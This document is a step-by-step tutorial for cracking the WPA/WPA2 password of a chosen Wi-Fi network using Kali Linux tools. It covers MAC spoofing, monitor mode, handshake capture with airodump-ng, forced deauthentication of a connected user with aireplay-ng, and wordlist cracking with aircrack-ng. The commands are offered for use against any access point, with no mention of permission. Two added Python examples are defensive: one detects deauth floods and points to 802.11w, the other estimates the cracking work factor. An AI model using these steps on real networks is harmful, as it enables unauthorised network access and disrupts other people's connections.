BackTrack is now Kali Linux; download it when you get some free time.
Pre-Requisites:
- Kali / BackTrack Linux, which by default has all the tools required to do what you want.
- A virtual machine or a laptop you can use to boot BackTrack or Kali.
- A compatible network card. The card should support packet injection if you want to do it fast; otherwise you will have to wait some time for someone to disconnect from and reconnect to the access point.
Important Phrases To Know:
MAC Address (Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.
WAP (Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi.
BSSID (Basic Service Set Identification) is the MAC address of the WAP.
ESSID (Extended Service Set Identification) is the display name of the wireless network.
WPA/WPA2 (Wi-Fi Protected Access / Wi-Fi Protected Access II) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
PSK (Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.
STEP 1: Changing Your MAC Address:
- In Kali/BT open the terminal.
- command : ifconfig
- This should list all network adapters on your system, including your wireless one, which should be named something like wlanX (wlan0, wlan1, ...).
- Turn off your network card using the command : ifconfig wlan0 down
Note: change wlan0 to whatever the previous command listed.
- command : macchanger -m 00:11:22:33:44:55
This will temporarily change the MAC address of your device.
- Turn the device back on : ifconfig wlan0 up
STEP 2: Create a virtual monitoring interface.
In order to listen to the signals that wlan0 is handling, we will create a virtual interface that lets us monitor and handle what wlan0 is sending and receiving.
- Command : airmon-ng start wlan0
- This will create a new monitor interface called mon0
STEP 3 : Start the attack by monitoring the wireless traffic
- Command : airodump-ng mon0
- This will list all active APs with their BSSID and other details. Below that list you will see the list of computer stations connected to any of these APs.
- Note down the BSSID and the channel (CH in the output) of the AP you want to hit.
- Hit Ctrl+C to end the monitoring.
STEP 4: Lock onto the needed AP.
This will target the communication from just the access point you want and start writing the collected information into a file, which you will need for the cracking step.
What we are hoping to capture is the 4-way handshake data that the systems use to authenticate; this data can then be used to crack the password used.
- Command : airodump-ng --bssid <bssid of AP> -c <channel> -w dumpfilename mon0
- Replace <bssid of AP> and <channel> (the CH value you noted in step 3) with the data you have; dumpfilename can be replaced with anything.
- This will start monitoring the access point and also show you the stations connected to it. Write down the MAC address of any one of the stations so that you can trick it into disconnecting and reconnecting.
STEP 5 : Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible; otherwise you will have to wait until the person disconnects and reconnects himself.
- Open a new terminal and give the command :
aireplay-ng -0 30 -a <BSSID of AP> -c <MAC of Station Connected> mon0
In aireplay-ng, -a takes the access point's BSSID and -c the MAC address of the station you noted in step 4. This will send 30 disconnect requests to the computer, causing it to try and reconnect to the access point.
- If it shows some error or does not seem to work, it is probably an issue with the network card and you will need to wait until the user reconnects by himself.
- Once the reconnection happens you can see it in the terminal from step 4 that is monitoring the packets. An alert should be shown in the top right corner.
- Hit Ctrl+C and exit it. Time to crack the password.
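The disconnect requests sent in this step are plain 802.11 deauthentication frames with the access point's address written in as the source, and that is also what makes them easy to spot from the defending side: a real access point does not send thirty deauths to one client inside a second. The following is an added example, not code from the original post: a small Python detector that flags any claimed source sending a burst of deauthentication or disassociation frames within a short window. The frame records are constructed in-line to stand in for a monitor-mode capture; the field names (ts, src, dst, subtype), the MAC addresses and the threshold/window defaults are assumptions, not any real tool's format.

```python
"""Spot a deauthentication flood in 802.11 management-frame records.

Added defensive example, not part of the original post. The frame records
are constructed in-line to stand in for what a monitor-mode capture or a
wireless IDS would deliver; the field names (ts, src, dst, subtype) and the
threshold/window defaults are assumptions, not any real tool's format.
"""
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0)
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C

AP = "AA:BB:CC:00:00:01"          # constructed BSSID of the access point
STATION = "11:22:33:44:55:66"     # constructed client MAC
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_flood(frames, threshold=10, window=5.0):
    """Return (source_mac, window_start_ts, count) for each source that sends
    at least `threshold` deauth/disassoc frames within any `window` seconds.

    Spoofed deauth frames carry the AP's BSSID as their source, so the alert
    names the *claimed* sender; the real sender is whoever is injecting
    frames on that channel, which the frame header cannot tell you.
    """
    recent = defaultdict(deque)   # source MAC -> timestamps inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda fr: fr["ts"]):
        if f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[f["src"]]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and f["src"] not in alerted:
            alerted.add(f["src"])
            alerts.append((f["src"], q[0], len(q)))
    return alerts


def constructed_capture():
    """Constructed sample: benign beacons, one benign deauth, then a burst of 30 deauths."""
    frames = [{"ts": 0.0, "src": AP, "dst": STATION, "subtype": SUBTYPE_DEAUTH}]   # one benign deauth
    frames += [{"ts": t * 0.1, "src": AP, "dst": BROADCAST, "subtype": SUBTYPE_BEACON}
               for t in range(200)]                                              # beacons every 100 ms
    frames += [{"ts": 10.0 + i * 0.02, "src": AP, "dst": STATION, "subtype": SUBTYPE_DEAUTH}
               for i in range(30)]                                               # the burst
    return frames


if __name__ == "__main__":
    for src, start, count in detect_deauth_flood(constructed_capture()):
        print(f"deauth flood: {count} frames claiming source {src} starting at t={start:.2f}s")
```

The single benign deauth at t=0 never trips the threshold; the burst does on its tenth frame. The structural fix on the network side is Protected Management Frames (802.11w), which WPA3 makes mandatory: with PMF enabled a station discards deauthentication and disassociation frames that are not integrity-protected, so a spoofed burst no longer forces the reconnection this step relies on.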
STEP 6: Cracking the password
- You need a password list file, which can be downloaded from the internet. Just search for "wordlist" or "password list"; you can get files with millions of words, some as big as 1 GB to 10 GB. The more words in it, the better.
- Get and extract the word list file to your home folder.
- Run the command :
aircrack-ng -w wordlist.lst -b <AP BSSID> dumpfilename*.cap
- Replace wordlist.lst, <AP BSSID> and dumpfilename with the right details.
STEP 7: Wait
- Wait some time as your computer does the dirty work of cracking the password. You should have the password on your screen soon.
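How long step 7 takes is not luck: WPA2-Personal turns the passphrase into the 256-bit pairwise master key with a fixed-cost PBKDF2-HMAC-SHA1 (4096 rounds, ESSID as the salt), so the wait is roughly the number of candidates in the wordlist divided by the derivations per second the machine manages. The following added example, not code from the original post, derives the PMK exactly as the standard specifies, checks it against the IEEE 802.11 test vector, benchmarks the derivation rate on the current machine, and converts that into the time needed to exhaust a wordlist or a random passphrase space. The 10-million-line wordlist, the 62-symbol alphabet and the ESSID "ExampleNet" are constructed illustrations.

```python
"""Work factor behind step 7: how long a wordlist attack on WPA2-Personal takes.

Added example for this post, not code from the original. The PBKDF2
parameters are the ones WPA2-Personal specifies for turning a passphrase
into the 256-bit pairwise master key (PMK); the wordlist size, guessing
rate and alphabet used below are constructed illustrations.
"""
import hashlib
import time

PBKDF2_ITERATIONS = 4096  # fixed by the standard
PMK_LENGTH = 32           # bytes (256 bits)


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).

    The ESSID is the salt, which is why precomputed tables only help against
    one network name at a time. Passphrases are 8 to 63 printable ASCII chars.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def benchmark_rate(essid: str = "ExampleNet", seconds: float = 0.25) -> float:
    """Measure PMK derivations per second on this machine (one core, no GPU)."""
    count = 0
    start = time.perf_counter()
    while time.perf_counter() - start < seconds:
        derive_pmk(f"candidate{count:08d}", essid)   # constructed candidate passphrases
        count += 1
    return count / (time.perf_counter() - start)


def seconds_to_exhaust(candidates: int, rate: float) -> float:
    """Worst-case time to try every candidate at `rate` derivations per second."""
    if rate <= 0:
        raise ValueError("rate must be positive")
    return candidates / rate


def random_passphrase_space(alphabet_size: int, length: int) -> int:
    """Number of passphrases of the given length over an alphabet of that size."""
    return alphabet_size ** length


if __name__ == "__main__":
    # IEEE 802.11 test vector: passphrase "password", SSID "IEEE"
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    rate = benchmark_rate()
    print(f"about {rate:,.0f} PMK derivations per second here")
    wordlist = 10_000_000                       # constructed: a 10-million-line list
    print(f"10M-word list: {seconds_to_exhaust(wordlist, rate) / 3600:.1f} hours")
    space = random_passphrase_space(62, 12)     # constructed: random 12 chars over [A-Za-z0-9]
    years = seconds_to_exhaust(space, rate) / (3600 * 24 * 365)
    print(f"random 12-char passphrase: {years:.2e} years")
```

The asymmetry is the whole story of step 7: a passphrase that appears in a 10-million-line list falls within hours at a few thousand derivations per second, while a random 12-character passphrase over 62 symbols (about 3.2e21 candidates) would take more than a hundred million years even at a million derivations per second. On the defending side that means a passphrase drawn at random rather than from words, and, where the hardware allows it, WPA3-SAE, whose handshake does not give an eavesdropper anything that can be tested against a wordlist offline.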
Happy exploits.